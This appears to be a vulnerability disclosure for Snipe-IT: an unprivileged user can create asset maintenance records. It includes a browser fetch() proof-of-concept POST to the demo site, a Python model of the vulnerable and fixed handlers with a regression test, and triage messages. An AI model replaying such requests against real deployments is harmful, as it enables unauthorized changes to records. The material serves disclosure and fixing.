Improper Privilege Management in snipe/snipe-it
Valid
Reported on Feb 10th 2022
Description
An unprivileged user can create a maintenance record for an asset.
Proof of Concept
1. Create a regular user and set DENY on all permissions in asset models.
2. Log in as that user and send the request below to create a maintenance record for an asset.
// Sent from the browser session of the user whose asset permissions are all DENY.
// The body is the normal "create maintenance" form; a correct server would reject it.
await fetch("https://demo.snipeitapp.com/hardware/maintenances", {
    "credentials": "include",
    "headers": {
        "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:92.0) Gecko/20100101 Firefox/92.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Content-Type": "application/x-www-form-urlencoded",
        "Upgrade-Insecure-Requests": "1",
        "Sec-Fetch-Dest": "document",
        "Sec-Fetch-Mode": "navigate",
        "Sec-Fetch-Site": "same-origin",
        "Sec-Fetch-User": "?1"
    },
    "referrer": "https://demo.snipeitapp.com/hardware/maintenances/create?asset_id=310",
    "body": "_token=Pvc8rsrc7DcKDjEtD6wtmstrGJfc74utYKkVfAh7&asset_id=310&supplier_id=8&asset_maintenance_type=Maintenance&title=mainrain11&start_date=2022-02-03&completion_date=&cost=&notes=by_admin",
    "method": "POST",
    "mode": "cors"
});
Impact
An unprivileged user can create maintenance records for any asset.
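The defect described above is a handler that saves the maintenance record without ever consulting the caller's permissions. The following is an added example, not Snipe-IT's own code: it models the permission-denied user from the proof of concept, a "before" handler that accepts the request, and an "after" handler that refuses it, then replays the report's form body against both. The permission keys (assets.edit and friends), the "1"/"0"/"-1" grant values and the in-memory stores are assumptions standing in for the application's real user model and policy layer; the CSRF token is a placeholder.

```python
"""Model of the authorization gap in this report, beside its fix.

Added example, not Snipe-IT's own code. The permission keys, the "1"/"0"/"-1"
grant encoding and the in-memory stores are assumptions, not the project's API.
"""
from dataclasses import dataclass, field
from urllib.parse import parse_qs


class Forbidden(Exception):
    """Raised when the caller lacks the permission the action requires."""


@dataclass
class User:
    name: str
    # permission key -> "1" allow, "0" unset, "-1" deny (assumed encoding)
    permissions: dict = field(default_factory=dict)
    superuser: bool = False

    def can(self, permission: str) -> bool:
        """Default deny: anything but an explicit "1" (or superuser) is refused."""
        return self.superuser or self.permissions.get(permission) == "1"


@dataclass
class Asset:
    id: int
    name: str


# Constructed inventory: one asset, matching the asset_id used in the PoC.
ASSETS = {310: Asset(310, "laptop-310")}


def parse_maintenance_form(body: str) -> dict:
    """Parse the URL-encoded POST body (same shape as the PoC) into a flat dict."""
    fields = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    return {
        "asset_id": int(fields["asset_id"]),
        "title": fields.get("title", ""),
        "notes": fields.get("notes", ""),
    }


def create_maintenance_vulnerable(user: User, form: dict, store: list) -> dict:
    """'Before': resolves the asset and saves; the caller's permissions are never checked."""
    asset = ASSETS[form["asset_id"]]
    record = {"asset_id": asset.id, "title": form["title"], "created_by": user.name}
    store.append(record)
    return record


def create_maintenance_fixed(user: User, form: dict, store: list) -> dict:
    """'After': a maintenance entry is an edit of the asset's record, so the
    asset-edit permission is required before anything is looked up or written."""
    if not user.can("assets.edit"):
        raise Forbidden(f"{user.name} may not create maintenance for asset {form['asset_id']}")
    return create_maintenance_vulnerable(user, form, store)


# Constructed request body mirroring the PoC; the CSRF token is a placeholder.
POC_BODY = (
    "_token=PLACEHOLDER&asset_id=310&supplier_id=8&asset_maintenance_type=Maintenance"
    "&title=mainrain11&start_date=2022-02-03&completion_date=&cost=&notes=by_admin"
)


def run_regression() -> dict:
    """Replay the report: a user with every asset permission set to deny posts the
    form to both handlers. Returns which handler accepted which caller."""
    asset_perms = ("assets.view", "assets.create", "assets.edit", "assets.delete")
    denied_all = User("regular", {k: "-1" for k in asset_perms})
    admin = User("admin", {"assets.edit": "1"})
    form = parse_maintenance_form(POC_BODY)

    vulnerable_store, fixed_store = [], []
    create_maintenance_vulnerable(denied_all, form, vulnerable_store)  # accepted: the bug
    try:
        create_maintenance_fixed(denied_all, form, fixed_store)
        blocked = False
    except Forbidden:
        blocked = True
    create_maintenance_fixed(admin, form, fixed_store)  # a permitted user still succeeds

    return {
        "vulnerable_accepted_denied_user": len(vulnerable_store) == 1,
        "fixed_blocked_denied_user": blocked,
        "fixed_allowed_admin": len(fixed_store) == 1 and fixed_store[0]["created_by"] == "admin",
    }


if __name__ == "__main__":
    for check, ok in run_regression().items():
        print(f"{check}: {ok}")
```

The point of the fixed handler is where the check sits: before the asset is resolved and before anything is written, so a denied user learns nothing about asset 310 and leaves no record. Running run_regression() as a unit test keeps the report's scenario from silently returning.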
We are processing your report and will contact the snipe/snipe-it team within 24 hours.
a year ago
We have contacted a member of the snipe/snipe-it team and are waiting to hear back.
a year ago
We have sent a follow up to the snipe/snipe-it team. We will try again in 7 days.
a year ago
"Create regular user and set DENY to all permissions in asset models."
Assets or asset models?
AssetMaintenancesController.php#L6-L307 has been validated
AssetModelsController.php#L20-L480 has been validated